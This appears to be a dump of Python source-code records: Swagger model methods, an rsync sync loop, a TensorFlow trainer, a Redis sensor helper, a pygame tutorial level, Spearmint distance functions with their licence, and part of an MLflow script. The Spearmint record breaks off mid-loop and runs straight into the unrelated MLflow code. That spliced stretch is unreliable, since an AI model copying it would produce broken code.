return value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n if hasattr(self, attr):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ArrayConnectionResponse, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ArrayConnectionResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a2f81c3e83be94b291073e1b5cb95eefa99a9ae", "content": "\"this program runs on ngc and syncs data with a local master machine\"\nimport time\nimport os\nimport ray\n\n\n@ray.remote\ndef sync(agentparams):\n master_datadir = agentparams['master_datadir']\n master = agentparams.get('master', 'deepthought')\n local_datadir = '/result'\n\n while True:\n print('transfer tfrecords to master')\n cmd = 'rsync -a --update {} {}:{}'.format(local_datadir + '/', master, master_datadir)\n print('executing: {}'.format(cmd))\n os.system(cmd)\n time.sleep(10)\n\nif __name__ == '__main__':\n conf = {}\n conf['master_datadir'] = '/raid/ngc2/pushing_data/cartgripper/mj_multi_obj_push3_75step'\n sync(0, conf)"} {"ext": "py", "sha": "1a2f832053fed1d3e402804f3c7c15ac914da468", "content": "import tensorflow as tf\nfrom build_model import embedded_neural_net, compile_model\n\n\ndef train_model(train_dataset: tf.data.Dataset, validation_dataset: tf.data.Dataset, max_features, patience=4,\n epochs=10):\n callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=patience)\n model_structure = embedded_neural_net(max_features)\n model = compile_model(model_structure)\n history = model.fit(train_dataset, validation_data=validation_dataset, epochs=epochs, callbacks=[callback])\n return model, history\n"} {"ext": "py", "sha": "1a2f8358cd2da66b6bd0cb458a18ee8b8b9a3c91", "content": "import redis\nr = redis.Redis()\nfrom datetime import date\ntoday = str(date.today())\nimport datetime\nimport pickle\nexisted = False\n\nstand = [460, 1.3, .7]\n\ndef gas_lvl(gas):\n status = 'normal'\n gas = gas.replace(' ','')\n gases = gas.split('|')\n ox = float(gases[0])\n red = float(gases[1])\n nh = float(gases[2])\n \n ox_diff = (abs(ox-stand[0]) / stand[0] ) * 100\n red_diff = (abs(red-stand[1]) / stand[1] ) * 100\n nh_diff = (abs(nh-stand[2]) / stand[2] ) * 100\n \n if (ox_diff > 30 or red_diff > 30 or nh_diff > 30):\n status = 'abnormal' \n \n return status\n \n \n\n\nclass RedisHelper:\n\n def __init__(self):\n self.r = redis.Redis()\n self.existed = False\n self.dev_key = 'devices'\n \n def read(self, span=1800):\n \n current = {\n \"temp\": -1,\n \"humidity\" : -1,\n \"gas\" : \"abs\",\n \"alerts\" : -2,\n \"messages\" : -3\n }\n \n msg, msgC = self.messages()\n \n currentTime = datetime.datetime.now()\n day = currentTime.strftime(\"%d/%m/%Y\")\n \n key = day\n #print(key)\n\n if (self.r.exists(key)):\n persisted = pickle.loads(self.r.get(key))\n self.existed = True\n self.dev_key = 'devices'\n #print(persisted)\n \n else:\n persisted = {}\n\n\n timeHM = datetime.datetime.now()\n temp = 0\n humidity = 0\n pressure = 0\n count = 0\n\n for keys in persisted:\n date_time_obj = datetime.datetime.strptime(keys, '%d/%m/%Y@%H:%M:%S')\n diff = timeHM - date_time_obj\n \n #print(diff.seconds, span)\n if (diff.seconds <= span) :\n count = count + 1\n temp = temp + persisted[keys]['temp']\n humidity = humidity + persisted[keys]['humidity']\n pressure = pressure + persisted[keys]['pressure']\n #print(keys, persisted[keys], diff)\n \n if (count > 0):\n #print(f\"averages are {temp/count} {humidity/count} {pressure/count} {count} \")\n last = list(persisted.keys())\n last_one = len(last) - 1\n gases = persisted[last[last_one]]['gas']\n if (gas_lvl(gases) != 'normal'):\n alert_message = 'Alert!'\n else:\n alert_message = 'Normal'\n \n current = {\n \"temp\": round(temp/count,2),\n \"humidity\" : round(humidity/count,2),\n \"pressure\" : round(pressure/count,2),\n \"gas\" : gas_lvl(gases),\n \"alerts\" : alert_message,\n \"messages\" : msgC,\n \"count\" : count\n } \n \n \n return current\n \n \n def devices_read(self): \n if (r.exists(self.dev_key)):\n devices = pickle.loads(self.r.get(self.dev_key))\n else:\n devices = {}\n \n docs = []\n for dev in devices:\n docs.append(devices[dev]) \n\n return docs \n \n \n def devices_update(self, dev): \n devices = self.devices_read()\n devices.pop(dev, None)\n r.set(self.dev_key, pickle.dumps(devices)) \n return devices\n \n def messages(self):\n if (r.exists('messages')):\n messages = pickle.loads(self.r.get('messages'))\n else:\n messages = {} \n\n return messages, len(messages) \n \n \n\n\n "} {"ext": "py", "sha": "1a2f8500def564faf471bf2a79af3c8ccc1af5de", "content": "# importation de pygame\nimport pygame\n# importation de la bibliothèque system\nimport sys\n# importation de nos classes\nfrom Model.class_Hero import Hero\nfrom Model.class_Platform import Platform\nfrom Model.class_Atk import Atk\nfrom Model.class_SacDeSable import SacDeSable\nfrom utils import load_imgs\n\n\ndef exit_game(key):\n\tfrom Model.class_Menu import run\n\n\tif key == pygame.K_RETURN:\n\t\trun()\n\n\n# initialisation de pygame\ndef main(self):\n\tpygame.init()\n\n\tWIDTH = 1280\n\tHEIGHT = 720\n\tfenetre = pygame.display.set_mode((WIDTH, HEIGHT), pygame.RESIZABLE)\n\n\tfond_e = pygame.transform.scale(\n\t\tpygame.image.load(\"Images/Background/niveauRecurciforce.png\").convert(), (1280, 720)\n\t)\n\n\tblanchonAa1 = pygame.image.load(\"Images/Spell/aa1.png\").convert()\n\tblanchonAa2 = pygame.image.load(\"Images/Spell/aa2.png\").convert()\n\tblanchonAa3 = pygame.image.load(\"Images/Spell/aa3.png\").convert()\n\tblanchonAaMidAir = pygame.image.load(\"Images/Spell/aaMidAir.png\").convert()\n\tblanchonVector = pygame.image.load(\"Images/Spell/vector.png\").convert()\n\n\timagesBlanchonList = {\n\t\t\"Ridle\": [\"b_idle_1\", \"b_idle_2\"],\n\t\t\"Rmove\": [\"b_move_0\", \"b_move_1\", \"b_move_2\", \"b_move_1\"],\n\t\t\"Ffall\": [\"b_jumpdown_1\", \"b_jumpdown_2\"],\n\t\t\"Fcrouch\": [\"b_crouch_1\", \"b_crouch_2\"],\n\t\t\"Rslide\": [\"b_slide\"],\n\t\t\"Fjump\": [\"b_jumpup_1\", \"b_jumpup_2\", \"b_jumpup_3\"],\n\t\t\"Oaa1\": [\"b_aa1_1\", \"b_aa1_2\", \"b_aa1_3\", \"b_aa1_3\"],\n\t\t\"Oaa2\": [\"b_aa2_1\", \"b_aa2_2\", \"b_aa2_3\", \"b_aa2_4\", \"b_aa2_5\", \"b_aa2_5\"],\n\t\t\"Oaa3\": [\"b_aa3_1\", \"b_aa3_2\", \"b_aa3_3\", \"b_aa3_4\", \"b_aa3_5\", \"b_aa3_6\", \"b_aa3_6\", \"b_aa3_6\"],\n\t\t\"Oaaa\": [\"b_aa2_2\", \"b_atkjumpdown\", \"b_atkjumpdown\"],\n\t\t\"Odmg\": [\"b_dmg_2\", \"b_dmg_2\"],\n\t\t\"D\": [\"b_gameover\", \"b_gameover\"],\n\t}\n\tpath = \"Images/Blanchon\"\n\timagesBlanchon = load_imgs(imagesBlanchonList, path)\n\tblanchon_atkList = [\n\t\tAtk(\"autoHit1\", 0.5, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 10, 5, -1, 0, 0, 0, 225),\n\t\tAtk(\"autoHit2\", 0.7, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 15, 5, -2, 0, 0, 0, 300),\n\t\tAtk(\"autoHit3\", 0.7, 32, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 15, 6, -16, 0, 0, 0, 500),\n\t\tAtk(\"EOF\", 4, 32, 17, load_imgs({\"idle\": [\"vector\"]}, path), 15, 4, -1, 0, 4, 0, 2000),\n\t\tAtk(\"airAutoHit\", 1, 64, 32, load_imgs({\"idle\": [\"particlehit\"]}, path), 10, 5, 5, 0, 0, 0, 300)\n\t]\n\tblanchon = Hero(200, 200, 64, 64, imagesBlanchon, 0.3, 0.7, 8, 6, WIDTH, 100.0, blanchon_atkList)\n\tsol = Platform(0, HEIGHT-70, WIDTH, 10, pygame.image.load(\"Images/plateformtest.png\").convert_alpha(), 0.4)\n\t# INIT PLATEFORMES\n\tplatforms = [\n\t\tPlatform(100, HEIGHT - 180, 100, 10, pygame.image.load(\"Images/plateform.png\").convert_alpha(), 1),\n\t\tPlatform(350, HEIGHT - 280, 100, 10, pygame.image.load(\"Images/plateform.png\").convert_alpha(), 1)\n\t]\n\n\t# INIT ENNEMIS\n\tfoes = [SacDeSable(600, 500, WIDTH, 1)]\n\n\t# INIT SYSTEM CLOCK\n\tclock = pygame.time.Clock()\n\tfps = 60\n\tMult = pygame.font.Font(\"Polices/Lady Radical.ttf\", 25)\n\tMult.set_bold(False)\n\tMultB = pygame.font.Font(\"Polices/Lady Radical.ttf\", 40)\n\tMultB.set_bold(True)\n\tdamageFont = pygame.font.Font(\"Polices/Lady Radical.ttf\", 30)\n\t# damageFont.set_bold(True)\n\n\tdamageArray = []\n\ttimerDamage = 300\n\n\t# TEXTE DU TUTO------------------------------------------------------------------\n\tself.myfontMini = pygame.font.Font(\"Polices/Lady Radical.ttf\", 15)\n\tself.myfont = pygame.font.Font(\"Polices/Lady Radical.ttf\", 25)\n\tfleches = self.myfont.render(\"Les fleches directionnelles servent a se deplacer\", 1, (200, 200, 0))\n\tatkDeBase = self.myfont.render(\"'A' (Q sous Windows) permet de donner des coups au corps a corps\", 1, (200, 200, 0))\n\tatkDistance = self.myfont.render(\"'Z' (W sous Windows) permet de lancer des projectiles\", 1, (200, 200, 0))\n\tcombol = self.myfont.render(\"Un combo est possible en realisant 3 attaques basiques successives\", 1, (200, 200, 0))\n\tdbSaut = self.myfont.render(\"Le double saut est possible\", 1, (200, 200, 0))\n\tquit1 = self.myfontMini.render(\"Appuyer sur 'Entree' pour \", 1, (200, 200, 0))\n\tquit2 = self.myfontMini.render(\"retourner au menu principal \", 1, (200, 200, 0))\n\n\twhile 1:\n\t\tclock.tick(fps)\n\t\t# GESTION EVENT------------------------------------------------------------------\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT: \t# si l'utilisateur clique sur la croix\n\t\t\t\tsys.exit() # on ferme la fenêtre\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\texit_game(event.key)\n\t\t\t\tblanchon.key_down(event)\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tblanchon.key_up(event)\n\n\t\t# GESTION DU DECORS--------------------------------------------------------------\n\t\t# Fond\n\t\tfenetre.blit(fond_e, (0, 0))\n\t\tself.screen.blit(fleches, (600, 50))\n\t\tself.screen.blit(atkDeBase, (600, 80))\n\t\tself.screen.blit(atkDistance, (600, 110))\n\t\tself.screen.blit(combol, (600, 140))\n\t\tself.screen.blit(dbSaut, (600, 170))\n\t\tself.screen.blit(quit1, (1100, 600))\n\t\tself.screen.blit(quit2, (1100, 620))\n\t\t# Plateformes\n\t\tnbPlatf = len(platforms)\n\t\tfor i in range(0, nbPlatf):\n\t\t\tfenetre.blit(platforms[i].get_img(), platforms[i].get_rect())\n\n\t\t# GESTION DU HERO----------------------------------------------------------------\n\t\t# Affichage Multiplicateur de dégats\n\t\tMultipl = Mult.render(\"Mult : \", 1, (255, 255, 0))\n\t\tcombo = blanchon.get_combo()\n\t\tif combo < 2:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 255, 0))\n\t\telif combo < 3:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (0, 0, 255))\n\t\telif combo < 4:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 0, 255))\n\t\telse:\n\t\t\tMultiplCombo = MultB.render(f\"{combo:.2f}\", 1, (255, 0, 0))\n\n\t\tfenetre.blit(Multipl, (700, 680))\n\t\tfenetre.blit(MultiplCombo, (800, 670))\n\n\t\t# CoolDown Attaque de Blanchon\n\t\tcolorRect = (125, 125, 125, 128)\n\n\t\tif not blanchon.get_onGround():\n\t\t\tcd = blanchon_atkList[4].get_cd()\n\t\t\tif cd > 0:\n\t\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (95, 655, 60, 60))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\ttailleRect1 = 60 * cd / blanchon_atkList[4].get_maxCd()\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tfenetre.blit(blanchonAaMidAir, (100, 660))\n\t\t\tCdAH = damageFont.render(f\"{cd:.1f}\", 1, (255, 0, 0))\n\t\telif blanchon.get_autoHitTimer3() > 0:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\tfenetre.blit(blanchonAa3, (100, 660))\n\t\t\ttailleRect1 = 60 * blanchon.get_autoHitTimer3() / 3000\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{blanchon.get_autoHitTimer3()/1000:.1f}\", 1, (255, 0, 0))\n\t\telif blanchon.get_autoHitTimer2() > 0:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\t\t\tfenetre.blit(blanchonAa2, (100, 660))\n\t\t\ttailleRect1 = 60 * blanchon.get_autoHitTimer2() / 3000\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{blanchon.get_autoHitTimer2()/1000:.1f}\", 1, (255, 0, 0))\n\t\telse:\n\t\t\tcd = blanchon_atkList[0].get_cd()\n\t\t\tif cd > 0:\n\t\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (95, 655, 60, 60))\n\t\t\telse:\n\t\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (95, 655, 60, 60))\n\n\t\t\tfenetre.blit(blanchonAa1, (100, 660))\n\t\t\ttailleRect1 = 60 * cd / blanchon_atkList[0].get_maxCd()\n\t\t\tposRect1 = 715 - tailleRect1\n\t\t\tCdAH = damageFont.render(f\"{cd:.1f}\", 1, (255, 0, 0))\n\n\t\tCaseAa = pygame.Surface((60, tailleRect1), pygame.SRCALPHA)\n\t\tCaseAa.fill(colorRect)\n\t\tfenetre.blit(CaseAa, (95, posRect1))\n\t\tif cd > 0:\n\t\t\tfenetre.blit(CdAH, (110, 670))\n\t\tif blanchon_atkList[3].get_cd() > 0:\n\t\t\tpygame.draw.rect(fenetre, (0, 0, 0), (175, 655, 60, 60))\n\t\t\tpygame.draw.rect(fenetre, (255, 255, 255), (180, 660, 50, 50))\n\t\telse:\n\t\t\tpygame.draw.rect(fenetre, (200, 200, 50), (175, 655, 60, 60))\n\t\t\tpygame.draw.rect(fenetre, (255, 255, 255), (180, 660, 50, 50))\n\n\t\tfenetre.blit(blanchonVector, (189, 677))\n\n\t\ttailleRect2 = 60 * blanchon_atkList[3].get_cd() / blanchon_atkList[3].get_maxCd()\n\t\tposRect2 = 715 - tailleRect2\n\t\tCaseAa = pygame.Surface((60, tailleRect2), pygame.SRCALPHA)\n\t\tCaseAa.fill((125, 125, 125, 128))\n\t\tfenetre.blit(CaseAa, (175, posRect2))\n\n\t\tCdProj = damageFont.render(f\"{blanchon_atkList[3].get_cd():.1f}\", 1, (255, 0, 0))\n\t\tif blanchon_atkList[3].get_cd() > 0:\n\t\t\tfenetre.blit(CdProj, (190, 670))\n\t\t# Teste Hero => Plateforme\n\t\theroOnGround = blanchon.isOnGround()\n\t\tblanchon.setOnAir()\n\t\tblanchon.testPlatform(sol)\n\t\tfor i in range(0, nbPlatf):\n\t\t\tblanchon.testPlatform(platforms[i])\n\n\t\t# Le hero est descendu d'une plateforme\n\t\tif heroOnGround and not blanchon.isOnGround():\n\t\t\tblanchon.giveDoubleJump() # On lui donne un saut\n\n\t\tblanchon.update(blanchon, fps)\n\n\t\t# AFFICHAGE DES DEGATS----------------------------------------------------------\n\t\ti = 0\n\t\twhile i < len(damageArray):\n\t\t\tif damageArray[i][2] > 0:\n\t\t\t\tfenetre.blit(damageArray[i][0], damageArray[i][1])\n\t\t\t\tdamageArray[i][2] = damageArray[i][2] - (1000/fps)\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tdamageArray.pop(i)\n\n\t\t# GESTION DES MOBS---------------------------------------------------------------\n\t\t# Teste Mob => Plateforme && Atk Hero => Mob\n\t\tnbAtkHero = len(blanchon.get_AtkEffectList())\n\t\ti = 0\n\t\twhile i < len(foes):\n\t\t\tfoes[i].nextImg(fps)\n\t\t\tfenetre.blit(foes[i].get_img(), foes[i].get_rect())\n\t\t\tpygame.draw.rect(\n\t\t\t\tfenetre, (0, 0, 0), (foes[i].get_rect().x, foes[i].get_rect().y - 10, 60, 6)\n\t\t\t)\n\t\t\tpygame.draw.rect(\n\t\t\t\tfenetre, (255, 0, 0), (\n\t\t\t\t\tfoes[i].get_rect().x, foes[i].get_rect().y - 10,\n\t\t\t\t\tint(max(min(foes[i].get_hp()/float(foes[i].get_hpMax())*60, 60), 0)), 6\n\t\t\t\t)\n\t\t\t)\n\t\t\tfoes[i].setOnAir()\n\t\t\tfoes[i].testPlatform(sol)\n\n\t\t\tfor j in range(0, nbPlatf):\n\t\t\t\tfoes[i].testPlatform(platforms[j])\n\n\t\t\t# Check si le mob i se fait toucher par l'atk de hero k\n\t\t\tfor k in range(0, nbAtkHero):\n\t\t\t\thpBefore = foes[i].get_hp()\n\t\t\t\tfoes[i].testAtkEffect(blanchon.get_AtkEffectList()[k])\n\t\t\t\tdegats = foes[i].get_hp() - hpBefore\n\t\t\t\tfoes[i].set_hp(degats)\n\t\t\t\tif degats < 0.0:\n\t\t\t\t\tdamageArray.append([\n\t\t\t\t\t\tdamageFont.render(f\"{degats:.1f}\", 1, (50, 150, 255)),\n\t\t\t\t\t\t(foes[i].get_x(), foes[i].get_y()-40), timerDamage\n\t\t\t\t\t])\n\n\t\t\tnbAtkFoe = len(foes[i].get_AtkEffectList())\n\t\t\tfor l in range(0, nbAtkFoe):\n\t\t\t\thpBefore = blanchon.get_hp()\n\t\t\t\tblanchon.testAtkEffect(foes[i].get_AtkEffectList()[l])\n\t\t\t\tdegats = blanchon.get_hp() - hpBefore\n\t\t\t\tif degats < 0:\n\t\t\t\t\tdamageArray.append([\n\t\t\t\t\t\tdamageFont.render(f\"{degats:.1f}\", 1, (255, 0, 0)),\n\t\t\t\t\t\t(blanchon.get_x(), blanchon.get_y()-40), timerDamage\n\t\t\t\t\t])\n\n\t\t\t\tfenetre.blit(\n\t\t\t\t\tfoes[i].get_AtkEffectList()[l].get_img(),\n\t\t\t\t\tfoes[i].get_AtkEffectList()[l].get_rect()\n\t\t\t\t)\n\n\t\t\tfoes[i].update(blanchon, fps)\n\t\t\tif foes[i].get_hp() <= 0:\n\t\t\t\tfoes.pop(i)\n\t\t\telse:\n\t\t\t\ti += 1\n\n\t\tfor i in range(0, nbAtkHero):\n\t\t\tfenetre.blit(blanchon.get_AtkEffectList()[k].get_img(), blanchon.get_AtkEffectList()[k].get_rect())\n\n\t\t# Affichage Hero\n\t\tblanchon.nextImg(fps)\n\t\tfenetre.blit(blanchon.get_img(), blanchon.get_rect())\n\t\tpygame.draw.rect(fenetre, (0, 0, 0), (blanchon.get_rect().x, blanchon.get_rect().y - 10, 60, 6))\n\t\tpygame.draw.rect(\n\t\t\tfenetre, (0, 255, 0), (\n\t\t\t\tblanchon.get_rect().x, blanchon.get_rect().y - 10,\n\t\t\t\tint(max(min(blanchon.get_hp()/float(blanchon.get_hpMax()) * 60, 60), 0)), 6\n\t\t\t)\n\t\t)\n\n\t\tpygame.display.flip()\n"} {"ext": "py", "sha": "1a2f850141c540cc0f646cba5238e1b9ff313898", "content": "# -*- coding: utf-8 -*-\n# Spearmint\n#\n# Academic and Non-Commercial Research Use Software License and Terms\n# of Use\n#\n# Spearmint is a software package to perform Bayesian optimization\n# according to specific algorithms (the “Software”). The Software is\n# designed to automatically run experiments (thus the code name\n# 'spearmint') in a manner that iteratively adjusts a number of\n# parameters so as to minimize some objective in as few runs as\n# possible.\n#\n# The Software was developed by Ryan P. Adams, Michael Gelbart, and\n# Jasper Snoek at Harvard University, Kevin Swersky at the\n# University of Toronto (“Toronto”), and Hugo Larochelle at the\n# Université de Sherbrooke (“Sherbrooke”), which assigned its rights\n# in the Software to Socpra Sciences et Génie\n# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement\n# between the parties, it is distributed for free academic and\n# non-commercial research use by the President and Fellows of Harvard\n# College (“Harvard”).\n#\n# Using the Software indicates your agreement to be bound by the terms\n# of this Software Use Agreement (“Agreement”). Absent your agreement\n# to the terms below, you (the “End User”) have no rights to hold or\n# use the Software whatsoever.\n#\n# Harvard agrees to grant hereunder the limited non-exclusive license\n# to End User for the use of the Software in the performance of End\n# User’s internal, non-commercial research and academic use at End\n# User’s academic or not-for-profit research institution\n# (“Institution”) on the following terms and conditions:\n#\n# 1. NO REDISTRIBUTION. The Software remains the property Harvard,\n# Toronto and Socpra, and except as set forth in Section 4, End User\n# shall not publish, distribute, or otherwise transfer or make\n# available the Software to any other party.\n#\n# 2. NO COMMERCIAL USE. End User shall not use the Software for\n# commercial purposes and any such use of the Software is expressly\n# prohibited. This includes, but is not limited to, use of the\n# Software in fee-for-service arrangements, core facilities or\n# laboratories or to provide research services to (or in collaboration\n# with) third parties for a fee, and in industry-sponsored\n# collaborative research projects where any commercial rights are\n# granted to the sponsor. If End User wishes to use the Software for\n# commercial purposes or for any other restricted purpose, End User\n# must execute a separate license agreement with Harvard.\n#\n# Requests for use of the Software for commercial purposes, please\n# contact:\n#\n# Office of Technology Development\n# Harvard University\n# Smith Campus Center, Suite 727E\n# 1350 Massachusetts Avenue\n# Cambridge, MA 02138 USA\n# Telephone: (617) 495-3067\n# Facsimile: (617) 495-9568\n# E-mail: otd@harvard.edu\n#\n# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own\n# all intellectual property in the Software. End User shall gain no\n# ownership to the Software. End User shall not remove or delete and\n# shall retain in the Software, in any modifications to Software and\n# in any Derivative Works, the copyright, trademark, or other notices\n# pertaining to Software as provided with the Software.\n#\n# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,\n# as such term is defined under U.S. copyright laws, provided that any\n# such Derivative Works shall be restricted to non-commercial,\n# internal research and academic use at End User’s Institution. End\n# User may distribute Derivative Works to other Institutions solely\n# for the performance of non-commercial, internal research and\n# academic use on terms substantially similar to this License and\n# Terms of Use.\n#\n# 5. FEEDBACK. In order to improve the Software, comments from End\n# Users may be useful. End User agrees to provide Harvard with\n# feedback on the End User’s use of the Software (e.g., any bugs in\n# the Software, the user experience, etc.). Harvard is permitted to\n# use such information provided by End User in making changes and\n# improvements to the Software without compensation or an accounting\n# to End User.\n#\n# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or\n# Sherbrooke or Socpra may develop modifications to the Software that\n# may be based on the feedback provided by End User under Section 5\n# above. Harvard, Toronto and Sherbrooke/Socpra shall not be\n# restricted in any way by End User regarding their use of such\n# information. End User acknowledges the right of Harvard, Toronto\n# and Sherbrooke/Socpra to prepare, publish, display, reproduce,\n# transmit and or use modifications to the Software that may be\n# substantially similar or functionally equivalent to End User’s\n# modifications and/or improvements if any. In the event that End\n# User obtains patent protection for any modification or improvement\n# to Software, End User agrees not to allege or enjoin infringement of\n# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,\n# or any of the researchers, medical or research staff, officers,\n# directors and employees of those institutions.\n#\n# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,\n# present, or share results from the use of the Software. In\n# accordance with customary academic practice, End User will\n# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers\n# of the Software and may cite the relevant reference(s) from the\n# following list of publications:\n#\n# Practical Bayesian Optimization of Machine Learning Algorithms\n# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams\n# Neural Information Processing Systems, 2012\n#\n# Multi-Task Bayesian Optimization\n# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams\n# Advances in Neural Information Processing Systems, 2013\n#\n# Input Warping for Bayesian Optimization of Non-stationary Functions\n# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams\n# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013\n#\n# Bayesian Optimization and Semiparametric Models with Applications to\n# Assistive Technology Jasper Snoek, PhD Thesis, University of\n# Toronto, 2013\n#\n# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED \"AS IS.\" TO THE FULLEST\n# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA\n# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR\n# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY\n# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\n# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND\n# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,\n# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE\n# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT\n# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.\n#\n# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT\n# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,\n# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL\n# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR\n# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,\n# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER\n# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH\n# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS\n# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,\n# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGES.\n#\n# 10. INDEMNIFICATION. To the extent permitted by law, End User shall\n# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke\n# and Socpra, their corporate affiliates, current or future directors,\n# trustees, officers, faculty, medical and professional staff,\n# employees, students and agents and their respective successors,\n# heirs and assigns (the \"Indemnitees\"), against any liability,\n# damage, loss or expense (including reasonable attorney's fees and\n# expenses of litigation) incurred by or imposed upon the Indemnitees\n# or any one of them in connection with any claims, suits, actions,\n# demands or judgments arising from End User’s breach of this\n# Agreement or its Institution’s use of the Software except to the\n# extent caused by the gross negligence or willful misconduct of\n# Harvard, Toronto or Sherbrooke or Socpra. This indemnification\n# provision shall survive expiration or termination of this Agreement.\n#\n# 11. GOVERNING LAW. This Agreement shall be construed and governed by\n# the laws of the Commonwealth of Massachusetts regardless of\n# otherwise applicable choice of law standards.\n#\n# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall\n# be construed as granting End Users or their Institutions any rights\n# or licenses to use any trademarks, service marks or logos associated\n# with the Software. You may not use the terms “Harvard” or\n# “University of Toronto” or “Université de Sherbrooke” or “Socpra\n# Sciences et Génie S.E.C.” (or a substantially similar term) in any\n# way that is inconsistent with the permitted uses described\n# herein. You agree not to use any name or emblem of Harvard, Toronto\n# or Sherbrooke, or any of their subdivisions for any purpose, or to\n# falsely suggest any relationship between End User (or its\n# Institution) and Harvard, Toronto and/or Sherbrooke, or in any\n# manner that would infringe or violate any of their rights.\n#\n# 13. End User represents and warrants that it has the legal authority\n# to enter into this License and Terms of Use on behalf of itself and\n# its Institution.\n\n\nimport numpy as np\n#import scipy.weave\nfrom scipy.spatial.distance import cdist\n\ndef dist2(ls, x1, x2=None):\n # Assumes NxD and MxD matrices.\n # Compute the squared distance matrix, given length scales.\n \n if x2 is None:\n # Find distance with self for x1.\n\n # Rescale.\n xx1 = x1 / ls \n xx2 = xx1\n\n else:\n # Rescale.\n xx1 = x1 / ls\n xx2 = x2 / ls\n \n r2 = cdist(xx1,xx2,'sqeuclidean')\n\n return r2\n\ndef grad_dist2(ls, x1, x2=None):\n if x2 is None:\n x2 = x1\n \n # Rescale.\n x1 = x1 / ls\n x2 = x2 / ls\n \n N = x1.shape[0]\n M = x2.shape[0]\n D = x1.shape[1]\n gX = np.zeros((x1.shape[0],x2.shape[0],x1.shape[1]))\n\n code = \\\n \"\"\"\n for (int i=0; i environment.yaml\")\n autocommit(file_paths=['./'], message='Another version of random forest')\n mlflow.set_tracking_uri(TRACKING_URI)\n mlflow.set_experiment(EXPERIMENT_NAME)\n\n digits = datasets.load_digits()\n\n n_samples = len(digits.images)\n X = digits.images.reshape((n_samples, -1))\n y = digits.target\n\n X_train, X_test, y_train, y_test = 